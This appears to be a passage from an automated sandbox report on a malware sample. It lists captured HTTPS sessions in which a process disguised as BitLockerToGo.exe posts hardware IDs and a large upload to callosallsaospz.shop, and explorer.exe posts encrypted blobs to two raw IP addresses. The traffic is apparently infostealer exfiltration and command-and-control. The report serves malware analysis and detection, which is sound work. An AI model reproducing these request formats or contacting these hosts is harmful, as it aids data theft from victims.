                                                                              Data Ascii: VMP67tFC0apmSnlvaTeqfow4qbtv3WfjN2bRyQSIHgVhUAPbUXLCWTerjsueHNZc6aettUpTuyGNYbvlF4UcDtKQioOrKBu9fX36bwxSYm9Ch+ZGXj1vHA50n7In1s3PLo+eiLjJVgcyFB1pRss45cYu99QAu2S0dh2juMIfO4NRCrbWdj6V0GH/xvPfQGwbAEwvQRP6UfYBsjsfoIYZQ/j5THpBxQQ6bNLtkP3OWD51XEyN432MTTcBMQtJ2OG


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              22192.168.2.449789188.114.97.34437784C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:39 UTC285OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 1273
                                                                              Host: callosallsaospz.shop
                                                                              2024-07-27 12:53:39 UTC1273OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 43 32 36 30 43 33 46 46 35 33 41 36 41 32 36 42 32 36 32 33 42 44 38 41 41 31 32 34 30 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62
                                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F2C260C3FF53A6A26B2623BD8AA12404--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
                                                                              2024-07-27 12:53:40 UTC804INHTTP/1.1 200 OK
                                                                              Date: Sat, 27 Jul 2024 12:53:40 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=p3cest58h4ujf77mve4o76r8d3; expires=Wed, 20-Nov-2024 06:40:19 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ug3rbqUSDzzgs9GNZyNvkxKYLFyZPUaZz%2B4TLyX6yOFKreRRbPmoPCLIvNOZV93rllG0ZioBap3vSOttzecoCyyJfGo0eBI2IqmR8OAxnUQ6VDjxn3sUnHZhDTY8LtuXZGvvBmh79Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8a9cc60978a87ca0-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-07-27 12:53:40 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                                                                              Data Ascii: eok 8.46.123.33
                                                                              2024-07-27 12:53:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              23192.168.2.449790167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:41 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:53:41 UTC1267OUTData Raw: 62 72 49 44 52 5a 70 78 35 4d 6c 34 4a 73 79 2b 72 64 7a 74 76 32 49 50 6f 58 4a 5a 7a 75 36 5a 79 42 30 69 6d 48 48 6a 4a 68 4e 39 4e 64 48 6d 42 65 32 43 38 69 52 65 43 53 44 41 39 66 6f 73 4e 4f 71 62 68 63 58 6a 56 4f 6c 41 72 41 65 52 57 6a 45 50 73 77 76 41 59 32 32 61 72 77 6a 69 62 43 66 69 68 7a 70 6c 68 6b 47 36 47 47 4c 37 53 63 6f 53 4d 38 6b 38 42 6b 5a 38 67 57 6f 6f 79 6a 77 44 56 55 50 37 4f 53 47 36 45 58 58 4a 55 4b 6f 6a 30 4d 73 71 36 5a 4c 34 5a 63 68 4f 69 50 35 68 30 55 56 5a 6f 48 41 72 2b 62 31 77 41 69 79 69 62 59 62 7a 31 54 69 45 69 58 46 39 39 46 32 39 47 39 63 78 4a 34 4d 78 75 6b 57 4c 4e 64 6e 2f 57 50 54 57 50 4e 79 6c 39 65 61 4b 50 62 77 6e 38 57 65 5a 58 65 79 52 38 4b 6c 42 57 54 63 49 37 4d 74 61 34 4a 43 75 46 78 51
                                                                              Data Ascii: brIDRZpx5Ml4Jsy+rdztv2IPoXJZzu6ZyB0imHHjJhN9NdHmBe2C8iReCSDA9fosNOqbhcXjVOlArAeRWjEPswvAY22arwjibCfihzplhkG6GGL7ScoSM8k8BkZ8gWooyjwDVUP7OSG6EXXJUKoj0Msq6ZL4ZchOiP5h0UVZoHAr+b1wAiyibYbz1TiEiXF99F29G9cxJ4MxukWLNdn/WPTWPNyl9eaKPbwn8WeZXeyR8KlBWTcI7Mta4JCuFxQ
                                                                              2024-07-27 12:53:42 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:53:42 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:53:42 UTC685INData Raw: 56 4a 7a 76 54 63 79 31 46 6e 5a 4b 4f 73 62 42 42 79 75 43 64 52 2b 76 59 37 4a 6d 69 75 50 4b 68 66 68 39 32 71 48 41 36 67 72 70 62 68 62 4a 30 53 6e 4a 53 4b 39 31 37 65 54 51 6e 48 35 51 42 4e 55 64 73 65 64 75 2b 64 76 6d 72 32 6f 74 59 56 6a 4f 4e 45 44 71 74 72 6e 2b 64 56 4f 32 54 52 47 62 74 66 66 49 54 57 70 70 45 68 4b 6a 55 5a 6b 67 30 4a 78 77 6f 41 32 71 38 62 69 43 62 45 6b 42 78 59 66 74 36 43 59 5a 33 64 49 50 2b 73 4b 4b 57 73 54 63 53 64 72 68 6b 59 32 30 52 57 34 75 39 41 65 30 30 46 31 41 4e 67 44 72 52 74 72 6e 5a 47 6c 67 65 53 68 54 30 73 37 68 66 71 43 41 6c 2b 75 4d 76 76 59 4e 45 4b 54 63 34 52 2b 54 6e 77 50 6b 35 34 42 67 5a 7a 49 4a 48 55 54 73 34 36 53 79 41 68 76 53 4d 38 54 71 74 44 4c 46 7a 73 4a 4f 4d 36 77 2b 5a 57 72
                                                                              Data Ascii: VJzvTcy1FnZKOsbBByuCdR+vY7JmiuPKhfh92qHA6grpbhbJ0SnJSK917eTQnH5QBNUdsedu+dvmr2otYVjONEDqtrn+dVO2TRGbtffITWppEhKjUZkg0JxwoA2q8biCbEkBxYft6CYZ3dIP+sKKWsTcSdrhkY20RW4u9Ae00F1ANgDrRtrnZGlgeShT0s7hfqCAl+uMvvYNEKTc4R+TnwPk54BgZzIJHUTs46SyAhvSM8TqtDLFzsJOM6w+ZWr


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              24192.168.2.449791188.114.97.34437784C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:41 UTC287OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 549248
                                                                              Host: callosallsaospz.shop
                                                                              2024-07-27 12:53:41 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 43 32 36 30 43 33 46 46 35 33 41 36 41 32 36 42 32 36 32 33 42 44 38 41 41 31 32 34 30 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62
                                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F2C260C3FF53A6A26B2623BD8AA12404--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
                                                                              2024-07-27 12:53:41 UTC15331OUTData Raw: 38 1e 4e 55 be 7f 1e 01 f5 86 28 0d 85 ef c6 0d 03 9e e4 98 58 ff 9f cb 08 fb 2a 80 26 2e e7 66 5b fc 65 c0 f6 49 3e 3a 8d ad 20 66 ba 40 f7 34 16 88 5d 51 87 95 f2 09 c9 21 be 05 67 9d 05 05 02 a4 89 eb 37 c6 4f c4 09 d0 e6 8b d5 a7 e2 ef 84 db 6d 44 04 1c 0b db cb 30 fa 43 c8 d6 d9 f9 20 ca 38 08 af 0f 4a 3a 82 fc 27 f3 20 38 1b aa 94 c2 1f 69 86 0b f7 03 07 ad 4e 40 ae e6 79 0b 22 d5 37 2e 2d 0a dc f8 b7 e5 e3 80 4b df 58 df bb b4 11 fb 21 a7 77 e8 50 cd fa 8d ab 54 a8 c0 be a2 c3 a4 e4 6a 62 88 eb 64 5a 14 0a ee dd ef 23 62 84 09 45 a6 9d 18 9a 96 83 01 49 fe f1 d4 5c 50 1c ec e8 b2 e6 d0 a0 81 9f 0e 58 3a f8 be 4f 0f 6c 37 96 df 7d 73 6a 74 f0 e2 ee 7e ef 1b 27 7b a5 7b 27 c7 14 ed df 3a 94 54 65 bf b1 a9 28 f8 ef 62 da ec e1 7f 80 56 55 e8 07 6f 41
                                                                              Data Ascii: 8NU(X*&.f[eI>: f@4]Q!g7OmD0C 8J:' 8iN@y"7.-KX!wPTjbdZ#bEI\PX:Ol7}sjt~'{{':Te(bVUoA
                                                                              2024-07-27 12:53:41 UTC15331OUTData Raw: 25 ba 30 b5 5a 0a 6f 5b 83 f1 01 c3 b5 54 13 ee f7 8f e3 71 65 a3 93 d3 d3 d1 75 fa 13 4a ce 2a 60 a7 63 04 44 90 db 87 a7 5a 06 12 55 94 14 23 e2 7e bd 3f 71 4c 3e d2 c0 a9 cb 10 e7 77 5c 85 cf 8f 97 af d6 d5 c1 3d 6a 2c fb f5 2e 83 c0 7f 57 cd 7a 5a e0 55 09 0f 8f e6 e7 11 8f 45 f3 0b ad 29 f5 2d 09 ed 6c 92 d3 7e b5 51 fb 28 8e 20 87 12 da 83 33 79 a8 bb 24 5e a9 f2 4a 30 b5 e5 4e 68 ed 9e fc 49 b9 7e fe ef ea 59 93 57 46 7f 9f 8d be 9a 1e b2 8f ef 6e 90 68 1f b5 d9 f0 79 63 34 ec 2f fe 4b b1 76 2a 84 1f fd 93 d9 bd ee 74 c5 ef 51 a6 21 a2 33 4b 34 2b b7 45 56 68 7d 38 f6 d8 10 d4 1d b5 25 f2 74 47 81 4a 3a 4b 79 82 97 2e 92 21 f1 82 1d 2c 9a 2e c6 1c df 9c e5 76 bf e7 e8 b7 9a e0 3d f4 7f ed 30 6d ed a4 3f 28 81 f8 17 65 17 af cf db 8c 44 0a 10 8e 86
                                                                              Data Ascii: %0Zo[TqeuJ*`cDZU#~?qL>w\=j,.WzZUE)-l~Q( 3y$^J0NhI~YWFnhyc4/Kv*tQ!3K4+EVh}8%tGJ:Ky.!,.v=0m?(eD
                                                                              2024-07-27 12:53:41 UTC15331OUTData Raw: fd e9 d9 de 4f 68 98 51 b9 e4 72 60 e3 45 bf 40 4f 66 c5 e7 91 9a 8a 97 ff b0 98 dc fc d8 d3 d5 53 2b 7f 9c 98 d4 e6 73 42 5d 63 3f b7 7e 53 7d 8d dd 6d 5e 71 ae 7d da 9f 49 cd db 0b 1c 85 8b 00 e6 d6 69 e0 78 61 07 cf 4e 9d 5e d9 42 61 96 db b0 04 ab f4 40 1b 87 a3 8e 0f b7 f9 ba fe e8 5e 84 d5 84 dc 64 81 34 90 8d 09 b9 e5 35 0f d1 ed 42 ed 0d 3e a8 e3 67 7a df 90 db 4c 9e 86 5b 68 01 87 8f bf 36 10 1f 61 0a 3c e4 ff bf 23 d0 91 cc 51 08 94 a1 a1 26 03 70 ad 2c 17 11 59 12 91 9a a5 28 70 21 e4 a9 36 df 1a 5d 5c 15 fb ea 95 e2 90 d6 0f 40 d8 43 74 c4 3c c3 12 bf 4c ba 7a 70 03 8b 9f 18 46 a9 a0 40 e2 47 4e 88 4d 84 4d 62 a8 61 93 55 69 10 6d 7c b6 71 c1 d5 80 75 97 ee 7a e3 a6 71 ef 8c e1 5a 1f 31 26 72 30 47 80 7e 46 06 46 13 7c ce ba 70 6b 14 a8 ce e6
                                                                              Data Ascii: OhQr`E@OfS+sB]c?~S}m^q}IixaN^Ba@^d45B>gzL[h6a<#Q&p,Y(p!6]\@Ct<LzpF@GNMMbaUim|quzqZ1&r0G~FF|pk
                                                                              2024-07-27 12:53:41 UTC15331OUTData Raw: da f6 34 c2 3c 5f 46 be 76 01 4c 25 cc 09 79 35 bf c7 8c 65 24 9a da 13 ff 8d 44 a0 a9 a1 62 7b a4 b1 f3 28 4f b4 79 3b ca dc 49 e3 d7 65 fc 4b bf ad f7 20 ba e3 5c 00 ab 0f 41 62 19 01 4c df 74 ba cd 9a 99 dd 79 72 f5 04 e7 9a 01 1e 3f a5 1b fc 55 32 10 cb 83 11 c6 f4 2a 8c a3 19 51 45 dd 46 73 b2 1f ac 19 4d c6 d8 70 a1 46 79 2b f7 4c a7 a4 d1 91 f1 3b 33 43 15 f1 9b 2f 05 28 fc 9c 3b a3 c1 d8 7a 52 ed 75 26 33 e2 ef 41 72 9d 44 a4 71 1d 82 1d 08 93 28 47 5d 22 d2 fa d0 8c b8 72 f5 74 f8 1e df d2 53 3e 15 c9 64 4b fb 8c 04 9c 90 e0 7e 46 c9 9e 5d 3a 5c d2 77 59 d3 1b cf 24 22 0f f3 99 54 fd 58 69 d2 ba b9 9a d9 ba c5 1d d6 a4 83 11 02 af 07 d4 c6 b3 de 70 81 3f 5f c7 9e 44 d6 18 e9 66 25 f0 0a 81 db 13 d0 e2 39 d3 cc 04 d1 d8 e7 0b e7 12 d8 3f be af e1
                                                                              Data Ascii: 4<_FvL%y5e$Db{(Oy;IeK \AbLtyr?U2*QEFsMpFy+L;3C/(;zRu&3ArDq(G]"rtS>dK~F]:\wY$"TXip?_Df%9?
                                                                              2024-07-27 12:53:41 UTC15331OUTData Raw: 56 14 38 36 c9 0d 45 ea 7c fd b6 64 99 5e d1 d1 14 cf b9 22 2c fe e3 6f 6e 87 2b f6 0e 1c e4 0f 9d c0 84 fa a3 7e 2c e0 62 b3 ea 4c 68 e6 61 13 21 12 9c f9 27 81 95 5e ac 04 95 6b e3 60 d9 37 bd a2 30 7b b7 0c 6c 88 81 5f 72 b1 eb a3 44 07 db 5e 9d 25 56 d7 77 4b d8 5e 78 e1 c5 d3 ff 1d a6 b9 9e 81 bd c3 25 2d 42 7f 85 d8 89 aa 32 91 54 d8 66 ac 56 94 65 b7 ae 56 fb 0c 65 a8 fb 61 de eb 83 fb b3 cf 5c 40 df 5c 63 9c d9 99 29 72 15 ba 49 55 d7 5c 46 cf a2 97 73 66 6c 8e 92 e9 ac 25 55 da 18 00 6f d1 8c 79 56 1f 29 4d 04 10 f6 88 45 29 71 b3 1b b6 d7 06 ff 5d 97 1c a9 61 76 4e fd 4c 90 3b ee 0c ef 03 0d 2a 3b fb 1d 66 5b 20 0c 38 24 c5 90 6f 80 a9 61 97 b8 c0 03 71 86 1e 22 ed ee 5e df f7 7e 6b f6 6e 13 93 2a c4 de f8 b5 55 49 cb f2 8b 37 59 7a e2 ca ee 99
                                                                              Data Ascii: V86E|d^",on+~,bLha!'^k`70{l_rD^%VwK^x%-B2TfVeVea\@\c)rIU\Fsfl%UoyV)ME)q]avNL;*;f[ 8$oaq"^~kn*UI7Yz
                                                                              2024-07-27 12:53:41 UTC15331OUTData Raw: 4d e1 10 76 14 17 35 39 e2 a3 f5 fc e3 58 bc cb 9d c0 6f 47 1e 2d 6d 65 7a 19 ef 13 d9 f0 72 14 50 a8 ee 79 e9 8d 29 1a be 8c c3 23 be ff 4e c7 8e 15 2f 98 93 f8 bf 6e b6 23 ea 80 b4 53 95 d1 cd 6c f3 54 df 27 0e ae fc 93 ba 23 d6 99 07 51 24 08 13 4a 7b ec 91 63 f3 b5 10 98 7d 16 0a 11 e5 b2 94 21 47 e1 de 93 1c ad 73 69 dc 7b 3d e8 98 3e bc cb 45 62 20 ef fd 48 8b b6 4d cd 5a d1 2c 0f b9 92 35 cd cc 11 ea 14 0d 77 91 2c 8e a8 3e 02 2c 46 33 35 50 df b1 bd 7f 69 c3 15 0d 57 71 90 5a 03 36 f6 6a 64 39 64 ed 68 2f 01 78 6a 9c 20 e2 50 08 9e 55 ec 9c 9d 25 32 c9 3a 3c f8 fd 0a a5 72 d7 6d 25 e6 c8 04 cb 52 2c 0b 1b f6 f3 57 ab ff ef 02 5f e6 61 66 49 f1 31 e1 85 cb 31 99 3a 18 e3 f3 64 5f de 59 99 38 43 71 2c 47 1a 7a 3d 12 37 5b 1c 23 ae 3a 10 66 9c a4 ea
                                                                              Data Ascii: Mv59XoG-mezrPy)#N/n#SlT'#Q$J{c}!Gsi{=>Eb HMZ,5w,>,F35PiWqZ6jd9dh/xj PU%2:<rm%R,W_afI11:d_Y8Cq,Gz=7[#:f
                                                                              2024-07-27 12:53:41 UTC15331OUTData Raw: c5 1d ed e8 b6 3f 86 82 41 e0 11 94 e1 b0 b7 f4 52 b1 5c ca 88 cb a9 4d 69 84 e7 b2 73 a6 71 13 fa 14 22 34 12 eb 85 54 a7 ae 66 a7 ee 7a 83 01 2e e7 d7 e5 58 f1 ce 78 f9 e0 ef be b0 36 be 38 e9 9b ef 50 fe b5 a9 0c 96 de 8e bd 2c 22 a3 09 dd 24 ab 88 60 2a f6 1a 24 6c 54 71 08 f7 72 4c f7 f7 8f 44 51 14 46 6f ad 92 2b 8f 73 f4 ea ab b9 29 ff 80 1e 45 48 c3 e8 98 d6 4a f5 b2 87 b5 25 4e 4c 64 58 7d 4a 08 e7 f6 f1 27 17 58 95 0e 4e 1d c9 3d 12 9a 7c e4 e4 f9 7f a7 cd 58 a4 75 d1 1d 76 44 c9 37 b6 d8 b6 59 b9 a8 95 9e d3 50 46 b6 4f e2 ce 8b 4b d3 86 a3 9f ec a0 cf 3c 4f e0 b3 58 30 2f dc 97 7e 0e 68 2d 1c 20 96 20 10 47 79 37 65 fb af a4 0d 60 01 39 1c 3a c7 07 ca ad dc 7f 79 bb 9f 7c 02 3a 8f 70 62 6c d2 22 f2 4f dd f2 20 3a 35 38 fa 65 55 a0 67 08 a7 f2
                                                                              Data Ascii: ?AR\Misq"4Tfz.Xx68P,"$`*$lTqrLDQFo+s)EHJ%NLdX}J'XN=|XuvD7YPFOK<OX0/~h- Gy7e`9:y|:pbl"O :58eUg
                                                                              2024-07-27 12:53:41 UTC15331OUTData Raw: 77 be 5b 97 b5 e5 27 aa cd 09 9a 02 40 02 2b 95 ea 9e a7 46 58 d0 d3 33 42 1f bd db a0 3f 74 62 c0 37 fd 49 6b f7 e7 87 f9 66 82 bc 5b f3 f6 9f 8c a8 ff bb 25 26 08 42 7c 16 17 d1 40 1b 7f 05 07 de a2 0b 05 50 c3 64 b2 e4 3f c1 69 da 3e 89 9b c7 6a 2c 8d f9 7d 75 10 0c 18 70 82 9c 23 4b ed 45 d1 03 1c 0a 95 86 b9 92 87 fb a5 46 5c e3 b1 23 aa 74 01 8c 36 cb 33 9a 1a 0c f0 eb 8f 59 63 2b 80 4f c5 7c f0 b8 c8 9b ad b8 7d d3 56 68 5e 3b 1f 3e 33 67 aa e6 c4 a9 cd 67 15 a9 c6 bc 82 63 e2 f7 20 d8 a8 5b 7f fd 8a 83 04 ea 7a c2 04 04 6e 10 70 0d b8 7a e5 a8 90 dd 54 7e 00 e1 a0 15 e2 de d0 9d 5c bb d6 9c 59 b2 8b 8d a9 d3 08 f6 b2 25 de 03 f3 1a 9d 44 48 3a 58 63 8c 4e da 44 14 e0 b6 cf e6 24 d0 05 04 7e 4d d9 14 da d8 da 06 66 ee 8d 2d ff e2 b5 a5 4c ad 47 50
                                                                              Data Ascii: w['@+FX3B?tb7Ikf[%&B|@Pd?i>j,}up#KEF\#t63Yc+O|}Vh^;>3ggc [znpzT~\Y%DH:XcND$~Mf-LGP
                                                                              2024-07-27 12:53:41 UTC15331OUTData Raw: 3f 45 f3 6f f0 f9 10 d0 b5 d7 d1 84 33 fc d7 24 05 1d e7 f5 69 02 5f ed ff ef a5 37 d6 71 7a 27 33 21 3e 26 b1 6c a7 21 2f f3 ae 9a 97 20 e2 8d 59 f4 58 63 22 60 d8 1d 05 f9 87 67 54 a0 fc 5f 66 4c 77 87 e1 8b 57 bf 88 56 ee bc 59 cc d6 40 40 e4 17 d7 d4 d3 de ac ab f9 e1 8c 84 fc a5 9a 09 97 29 78 a2 b6 89 54 81 56 17 b0 6c dd 11 7a 14 86 61 6a 50 8c 5a a1 29 ce db fd fa 72 91 4a ca 04 80 9d 1c bd e3 fc 8d 21 df d9 81 9e 1e d2 07 5c e7 0f 8c d6 84 f7 dc 16 70 0c 5a 78 35 6f af 42 6c a1 67 79 0c 56 ca 0d 96 dc 75 c9 17 5b 18 08 93 8a f4 6e 56 ee 18 5b 2a d6 a6 47 51 eb 66 3d f2 42 10 ee 05 8c fd b9 3e f6 8a 30 08 f1 9e 9b 95 87 c3 fc a0 d7 9a 49 13 1f f6 a4 c0 a2 8e 9f a8 92 ac d9 be 0a ee 7b c9 20 a7 dd 64 1b 96 c7 08 b4 fe 5c d3 85 e2 3d aa a6 a2 0d 32
                                                                              Data Ascii: ?Eo3$i_7qz'3!>&l!/ YXc"`gT_fLwWVY@@)xTVlzajPZ)rJ!\pZx5oBlgyVu[nV[*GQf=B>0I{ d\=2
                                                                              2024-07-27 12:53:43 UTC810INHTTP/1.1 200 OK
                                                                              Date: Sat, 27 Jul 2024 12:53:43 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=s0s6j5e9l7jp7d38qlifqia22r; expires=Wed, 20-Nov-2024 06:40:22 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WB%2F7vW2hY5OZNB9rxw3PuWfdjEO3bu9ckeae1EZVquqgHpQmiXUBfsD9hlYr2zBD7QKWrGq%2BY6yM92yVcBJR4pPyZ167usPxZ9p%2FWSDRbPdsjccvItw94YlPFrkDhj3B%2BC9pc5un3g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8a9cc6190b7b7d1c-EWR
                                                                              alt-svc: h3=":443"; ma=86400


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              25192.168.2.449792107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:42 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:53:42 UTC1267OUTData Raw: 5a 77 4f 33 45 4c 49 33 47 64 2f 67 41 65 73 4e 72 59 77 4e 34 32 4c 72 70 74 49 55 2f 64 7a 2f 44 63 69 5a 48 64 6e 57 38 34 2b 74 4d 46 52 50 47 79 70 77 57 2b 35 47 66 42 34 45 70 5a 2b 4c 58 4c 31 68 62 4a 4b 79 45 2b 57 76 77 31 76 58 47 57 50 39 46 63 59 70 5a 68 4e 42 6f 76 37 59 4a 46 4b 45 75 64 43 5a 6c 4e 65 57 67 2b 4d 2f 70 4d 31 44 34 32 51 64 2f 71 56 58 37 67 2f 65 66 39 67 6e 62 2f 59 71 37 49 43 39 53 30 6a 55 78 79 65 45 30 77 47 47 44 37 4a 73 68 46 7a 6f 34 57 75 4d 6c 66 34 4e 59 46 2f 37 2f 50 51 7a 34 78 77 5a 6d 4e 4f 45 76 69 74 78 45 34 65 56 53 56 46 32 65 54 6c 72 73 44 4d 6b 45 49 33 59 4f 30 6d 4a 61 4b 78 54 61 53 43 34 42 50 4b 57 71 53 39 4c 67 63 62 4f 68 56 73 43 79 37 43 73 4b 41 4a 54 62 44 77 36 73 63 31 38 6c 72 68
                                                                              Data Ascii: ZwO3ELI3Gd/gAesNrYwN42LrptIU/dz/DciZHdnW84+tMFRPGypwW+5GfB4EpZ+LXL1hbJKyE+Wvw1vXGWP9FcYpZhNBov7YJFKEudCZlNeWg+M/pM1D42Qd/qVX7g/ef9gnb/Yq7IC9S0jUxyeE0wGGD7JshFzo4WuMlf4NYF/7/PQz4xwZmNOEvitxE4eVSVF2eTlrsDMkEI3YO0mJaKxTaSC4BPKWqS9LgcbOhVsCy7CsKAJTbDw6sc18lrh
                                                                              2024-07-27 12:53:44 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:53:43 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:53:44 UTC685INData Raw: 59 66 4b 38 62 51 30 44 2b 69 6c 32 5a 79 6c 50 6b 39 38 4e 42 4e 52 41 69 78 76 31 42 66 55 63 4a 44 6e 4c 4c 37 35 6d 58 47 7a 48 30 6e 78 78 61 49 6a 73 78 32 6a 61 58 52 45 48 7a 66 76 75 76 33 79 36 31 43 30 69 76 76 65 79 31 43 5a 58 4a 47 43 63 2f 51 64 35 4d 35 4b 69 6e 6f 57 6a 72 39 2b 71 2f 73 37 4d 34 4d 61 6e 77 45 32 73 62 7a 38 4c 58 38 56 7a 62 72 51 6c 58 4f 35 36 2f 53 74 37 5a 4a 35 36 59 4f 67 65 45 43 36 6c 68 75 2b 4e 74 6a 43 38 2b 67 57 50 37 53 62 62 4d 30 4a 51 6d 49 66 6c 44 53 4c 62 7a 4c 59 52 57 39 54 72 69 58 65 50 79 59 6d 6a 4a 39 39 37 2b 55 38 6a 56 4e 2b 68 33 48 43 54 43 5a 45 54 4c 30 4f 56 75 43 2f 50 56 2f 57 59 65 73 61 50 77 72 50 4d 6f 72 44 51 7a 4a 4b 6b 53 69 2f 31 33 2b 7a 4f 33 4c 79 63 55 5a 7a 2b 34 70 6f
                                                                              Data Ascii: YfK8bQ0D+il2ZylPk98NBNRAixv1BfUcJDnLL75mXGzH0nxxaIjsx2jaXREHzfvuv3y61C0ivvey1CZXJGCc/Qd5M5KinoWjr9+q/s7M4ManwE2sbz8LX8VzbrQlXO56/St7ZJ56YOgeEC6lhu+NtjC8+gWP7SbbM0JQmIflDSLbzLYRW9TriXePyYmjJ997+U8jVN+h3HCTCZETL0OVuC/PV/WYesaPwrPMorDQzJKkSi/13+zO3LycUZz+4po


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
